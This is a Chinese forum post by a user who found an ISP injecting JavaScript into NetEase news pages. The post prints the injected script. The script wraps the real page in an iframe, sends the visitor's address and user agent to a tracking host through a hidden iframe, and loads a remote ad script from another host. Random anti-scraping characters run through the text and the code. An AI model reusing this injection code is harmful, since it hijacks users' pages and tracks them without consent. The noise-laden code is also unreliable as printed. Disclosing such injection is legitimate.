|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑 8 N0 h7 n1 G8 o5 u& y
1 H, r5 M* v; {5 `上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
* b) r+ p8 J2 m4 Y$ M) I$ E: d2 n# {. e$ {# S7 N
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
% e( x# O5 L, k# Q, _0 u3 k4 [1 p- [https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
$ G4 {4 _) y2 b
" t6 F- v2 @7 ] X- Q" s顺便查下ip138:
3 m8 x. z) ] N0 D+ E$ c. A% d! x% r2 ]% s2 J
这是那段js里面的代码,好象是个半成品还没写入广告数据:
3 I) K _+ Y5 v( d4 {# P- function locationSearch() {; \/ E2 b3 k' O' O
- var s = getMainJs();- F' b2 @' S6 D* C1 ]: s
- if (s == null) {
) W/ y) f0 a' U/ r! a P - location.reload();* n! |8 h( v( }9 ]* @
- }
4 T* |: L* M/ J6 u* r- I4 o; v7 J2 w - return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
0 _: z6 c; Z) V$ |5 `( j9 \* D o - }$ W) s9 o- p, y/ W7 H8 K/ g' u: |) a
) l" V) k; {: m- function getParameter(name, paraStr) {- \0 p, H+ [5 z
- var result = "";
. [( k( k. P/ ^; e5 d - var str = "&" + paraStr.split("?")[1];# r) E, `/ |6 v% j. p" N. k
- var paraName = "&" + name + "=";
. A* r$ m9 `& c8 g+ A; M- K - if (str.indexOf(paraName) != -1) {" x8 e( d) f+ r0 z" V9 E
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
" h O3 j2 R% F3 b, h, x. _ - var TmpStr = str.substring(str.indexOf(paraName), str.length);: S9 _+ m' {" t; q0 M0 M
- result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
$ v5 B) d- Y0 |2 }, N - 1, TmpStr.length).indexOf("&")+ E$ e* g$ A8 `# `9 h! B
- - TmpStr.indexOf(paraName) + 1);4 T; N5 B |" \: B5 f6 H; R2 {
- } else {
7 f3 f5 a- U; W1 Y N - result = str.substring(str.indexOf(paraName), str.length);
- \6 U, }1 Q) ~* P: k3 ~8 \ - }
( K/ \6 G& |, ~& a5 ?* }, N
, a1 H# ?! t7 J- result = result.substring(result.indexOf("=") + 1, result.length);
0 R2 w b5 G( E: S/ M/ y5 j5 r+ s - } else {, h( i- _" s1 I+ F& y
- result = "No such parameter";
& Q {) E- f# @9 P- I - }
6 S; O0 O/ L- D# X+ V - return (result.replace("&", ""));
- j8 Z9 G+ c; ~7 i% Q - }
& r, I& f: F/ J. r! y - 3 y. W b4 [: z; ?9 t
- function getMainJs() {! D' [9 N u+ W& e6 d: T/ \# s; e
- var scripts = document.getElementsByTagName("script");) u8 H( n$ e3 w4 {6 w
- var s = null;
2 z7 t) n% @/ x0 j5 t" q( J - for (var i = 0; i < scripts.length; i++) {8 G5 T) X' x& K
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
2 M) l# X+ E6 i0 N) j$ H& Q - s = scripts[i];
' L2 q! w* \2 I& m1 ]: W' L1 ` - break;
4 C. y0 h3 ]6 @8 o+ [' c - }
W* O0 H& }3 O4 i3 X - }8 G9 [' b4 N) A4 h: c, p6 u
- return s;) t6 Y5 b7 y; X. u8 w
- }. M) f. A( U; t: m) `
% Y% [8 [# v5 n; {7 M/ o5 M ^9 I- function appendParam(oStr, aStr) {
% Y) |+ _' c, s - if (oStr.indexOf('?') > 0) {
- x$ @7 C. M- C7 v6 C - oStr = oStr + "&" + aStr;
$ Y+ M* n+ c F0 ` - } else {
, |2 p6 e3 [. O! g+ C - oStr = oStr + "?" + aStr;2 t- E/ D" h; b% k9 F
- }
1 |: j: f3 E+ V - return oStr;- }2 K2 [1 e8 V( X3 f" _
- }
) ^. X# s( f, u3 L
7 g# E- L. \' @' x5 S8 J0 [2 g- window.onerror = function() {* i0 y l" w7 z7 ]/ C: f8 b
- };1 _( \; |8 M) w! K
- ' X Y+ M% M; L# |( e
- var g_titleTime = 0;
% g4 J+ {$ y4 Q9 W9 Z/ M. w - function setTcTitle() {
! y5 D `! i0 y; e! m' I - if (undefined == document) {4 \5 ]- \, i' a `
- g_titleTime++;- D4 B5 [0 j5 V0 }
- setTimeout("setTcTitle();", 1000);2 w: u5 H- R- h
- return;3 W" t* t8 B2 u! o
- }1 x7 z$ `; E Y g* y3 o& J
) e' R: K/ c0 `" q- var doc;
6 A9 E& \6 b' C* h h- r# [ - try {
0 l) ?3 p6 G* m5 m& g - if (document.all) {
, Z, }* Z/ n3 h0 W' J - doc = document.frames["cn"].document;' V$ E3 n! L" x. n5 O9 }0 Y
- } else {5 W( T% d) s7 d7 N: [% o/ S1 E! J
- doc = document.getElementById("cn").contentDocument;
% Z) R; H. Q2 x3 |" m( H5 k - }
1 a- s5 ^! a# u: l6 j3 t - } catch (ex) {$ \6 {, \4 ~3 n9 l4 C1 d
- }
R, F3 l$ a/ X4 L3 h* ^
$ x3 Z v3 M$ Q8 c5 D& s- if (g_titleTime < 5
0 a# r' R' L- H! Z2 i - && (undefined == doc || undefined == doc.title || "" == doc.title)) {
# Z1 D5 m. [! R - g_titleTime++;
, M2 S! `" Z1 ] - setTimeout("setTcTitle();", 1000);
0 x4 k8 P7 \. Q- _9 G - return;
3 u* \/ U0 h& F; l - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {' ^/ f4 a5 k+ l
- document.title = doc.title;' ^' b. J6 G1 p
- setTcAdvVisible();
+ z4 m3 w# q* j8 S; p - }$ X X0 Y; X; }4 n l4 ^; K0 g
- }, ~; F5 f, e* m
- # \$ s9 P1 ]2 w
- setTimeout("setTcTitle();", 1000);4 M" j5 A7 {6 J% V4 r
- : a' Z/ h" D i4 L! I
- var g_isHaveVisible = false;
1 O% u! D x$ H2 o - function setTcAdvVisible() {& ^% f* `5 {5 v7 Z1 c1 F* n" T" [$ d
- if (undefined != document && undefined != document.getElementById("addiv")0 W& W/ a8 W, ]( o( e
- && !g_isHaveVisible) {
8 Q! @$ J+ u) ~: f( n) { - document.getElementById("addiv").style.visibility = 'visible';, m: u/ A) ]! _1 m" b; L
- document.getElementById("addiv").style.display = 'block';9 ~( Z+ W4 x$ p
- g_isHaveVisible = true;
+ f8 ~& z6 D6 ~; V T1 i - }- D( \$ n, Q5 j" M7 _0 w, E! W. X7 D
- }+ D( |% k: ?0 f; v5 Q' U0 y
- . ]8 H# @2 {1 E, w# V2 E3 b- b
- function UrlAnalyzer() {
/ c1 q3 o) n# D$ s& {' G& \- { - this.divda = "";9 z, u$ I' r9 W z6 p
- this.tctype = "";
" _& _5 G8 u8 l, y: ?; H% |7 X - this.radius = "";
. g, c- H; Z j6 P# r$ z - this.rlu = "";/ C! F0 A R R
- }
, }! p. C7 F, ?. q0 z - + _ `) g1 ^0 q* k+ P8 x+ X
- UrlAnalyzer.prototype.initParameters = function() {8 {# v$ d5 N; z
- var paraStr = locationSearch();
& }- v3 S, W4 d: a: \* w - this.rlu = getParameter("lruedct", paraStr);+ c# _; [! Y& S
- this.divda = getParameter("divda", paraStr);) h) ?: L; Q6 q9 j6 D ]- e* f
- this.radius = getParameter("radius", paraStr);8 l$ p& l8 V j% T( o, E9 e5 |
- this.tctype = getParameter("tctype", paraStr);
* n& O1 J4 e- N; o" p" n& R - this.address = getParameter("address", paraStr);
3 U0 F2 p9 F/ L - this.usagent = getParameter("usagent", paraStr);
$ ]# O( Y: O h, D; F7 Q/ h - }
9 E( s, [1 u" d# v2 G1 Z3 c
7 q1 p8 ]7 {; {- UrlAnalyzer.prototype.getHtmlDoc = function() {1 N$ E! }+ u- S' F% @
- var doc;& N2 n9 g) w3 H" }1 c
- try {6 n4 m- Y! W! K: n' E) h
- if (document.all) {
8 s1 O @0 p { - doc = document.frames["cn"].document;
4 W: f V+ H9 e8 z" W* @7 g. e
8 K+ [' T. i4 ?- } else {
; I0 Z+ w; K! R& A1 @ - doc = document.getElementById("cn").contentDocument;4 a% J0 ~6 D! S6 |* B1 _" [
- // doc = document.getElementById("cn").contentWindow.document;" y# j- N8 q) K! w$ M% ~
- }# ?0 j/ l0 L, _' h& I7 H6 g0 j* B
- } catch (ex) {
- H7 X [4 F+ \7 B% Y K4 f - }+ V3 K2 S J# `- c" `6 j U7 M% k
- return doc;. v; q. ~* G3 w. b
- }' F& \0 e9 Q( l2 Y) ?- i) {
- : E K% ] {* Q9 i% J; l0 H
- UrlAnalyzer.prototype.setDomain = function() {
4 C' n/ X( `; L. b5 M9 r, N2 z - if (undefined != document.title && "" == document.title)
( y4 z) l7 ]: B) c9 e/ A - {+ _ k: @( x- {8 N( v1 R, z
- var index = document.domain.indexOf(".");
# b. H* X) Y* U0 g - if (undefined != index && -1 != index) {* A {1 i) N) o2 g# A0 [
- document.domain = document.domain.substring(index + 1, {4 U, _/ H) b$ {
- document.domain.length);) J% M3 [- B+ g7 D
- }" `! p* i5 R8 l3 l% y, a: A
- ( u& X$ a$ E! _' h
- var doc = this.getHtmlDoc();# v; {% w- ], U; `
- if (undefined != doc && undefined != doc.title && "" != doc.title) {# M( `/ B: j$ v# b5 s6 Q
- document.title = doc.title;" A$ M2 P/ P* d$ g1 q1 @/ M
- setTcAdvVisible();) a k0 z6 a5 R/ [
- }
, X2 C( ^/ L7 g% p9 {) ?. E - }, i' ]' Z# `( n6 K2 h. Z7 z3 Q
- }! a! a: {# @; t9 W1 b7 m! e1 h
- , u% {; o. V; {) ?# _5 z6 X
- UrlAnalyzer.prototype.iframeCallback = function() {
: p. v8 [% s* J' e3 B6 z) ? - var doc = this.getHtmlDoc();
: q& K% ^7 v1 o, w _8 [1 c T/ j' M - if (undefined == doc || undefined == doc.title || "" == doc.title) {
- R9 @; y, a2 G+ p/ p - if (undefined != document.domain) {
' P& \6 y# N% e2 |* f - 8 P! ^ i- N' p: C" a
- var self = this;! J: ~+ F2 h/ Y- x8 G
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);4 D0 ~) G5 s, O0 b' H( n
- // var index = document.domain.indexOf(".");
! X9 D: s: H- G/ d - // if (undefined != index && -1 != index) {+ U6 D% T6 ~7 N$ v; ^* f9 }
- // document.domain = document.domain.substring(index + 1,
; @/ t. {2 H% M% p - // document.domain.length);
0 M2 w# p- p, S! R. r% z9 K - // }* k2 D+ v C! L$ q2 k
- //
& {, \8 d+ e7 S6 E$ o - // var doc = this.getHtmlDoc();
; _0 h$ j) `, S - // if (undefined != doc && undefined != doc.title && "" !=. t' ] A- m# K8 A$ ]4 G7 w; O
- // doc.title) {
6 S% D ^- [+ I5 i - // document.title = doc.title;
$ g( Q1 K# w1 b/ @ - // setTcAdvVisible();! X+ \9 `& P" n3 l$ f: g( L: E
- // }
+ [1 h& [: R6 ^! W" w4 B - }3 |+ g8 D% A) g8 G& b8 o; H
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
! _" V0 d) @) [0 V - document.title = doc.title;8 U3 @0 P; W5 S
- setTcAdvVisible();% j7 c8 I- {( r. X7 `/ F1 N5 n& t. @
- }/ _$ y" y& G$ y' ~+ W( ?$ G
- }
9 ^; z! o8 U& ]- Z) ~
6 R; z- _# G, I7 s- r& m3 J8 K- UrlAnalyzer.prototype.executeHtmlContext = function() {
3 F' K& { q2 T) N1 Q- J" C - var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda% ?7 w- P6 l( l& x9 F4 x
- + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;9 y7 c# { t8 j0 ?% M6 s
- ! m% @4 U" C- _/ X+ s" R2 X) m" C
- var htmlStr = "<iframe src="" + staUrl
- o( L; x3 Y6 f3 N4 j& `) h - + "" style="display:none"></iframe>";
5 {% e- H# P- f( y - ) q# `2 n2 K/ L8 w
- var advUrl = htmlStr
, T/ L% V2 C6 O; y3 t t0 I - + "<script src="http://c2.sxite.com:8060/center?advId="5 h+ o* n. f. P1 R5 @
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";" T- i2 v1 c' Z- r- [
- document.write(advUrl);
! B( j) |* I: C2 F
! f* _7 u2 Q8 \' a& j: B* c: c- var self = this;
9 h. @9 P- m# R# A - var iframe = document.getElementById("cn");
6 K7 e* C$ m5 z% A- w - if (iframe.attachEvent) {
( ]# k5 S+ N+ Q3 Z0 b$ P$ ~ - iframe.attachEvent("onload", function() {7 S7 k* s0 @" K. h; @1 v
- self.iframeCallback.call(self, null);$ f: D% f' L7 X
- });1 I$ y' |- L" \, X* F9 b# G, ]( D
- } else {
. ?% b6 B3 y) W4 }; } - iframe.onload = function() {
2 f% L% S, m4 s6 L! e - self.iframeCallback.call(self, null);
' }/ ^2 a# X( F7 d$ P" L, e - }6 K2 h% T2 Y- X$ }
- }" k* `; B2 P3 n' S2 S. J
- }
& D# O( I& V( ^( P2 M- Q0 x
: o5 L. I/ O: j1 J0 z) L4 |2 t- UrlAnalyzer.prototype.executeMain = function() {$ D) |$ f0 L# J3 v8 f% V
- var mainFrame = document.getElementById("cn");
7 [) ~" @ F, P6 d8 B5 j% Y' k- K - mainFrame.contentWindow.location.href = mainFrame.src;
% b/ I& N: E, s) F) r; v; R - this.initParameters();
8 v+ I; x' a" q2 }. s1 N - this.executeHtmlContext();
& Y9 e f" ~" s6 K+ ^) K; v" @. ] - }1 S R3 ^" W) i* F V7 Z7 ~
- " P0 H% U5 x8 ~: w5 K( Q
- var g_analyzer = new UrlAnalyzer();
* E+ S4 k4 d* d2 j) s3 N - g_analyzer.executeMain();
' T$ k- \6 J: h3 P
; O {5 n6 A2 d* F
' s, V* h* U; t+ F
% L' {5 @3 P7 Q i& R0 J. Y+ q |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
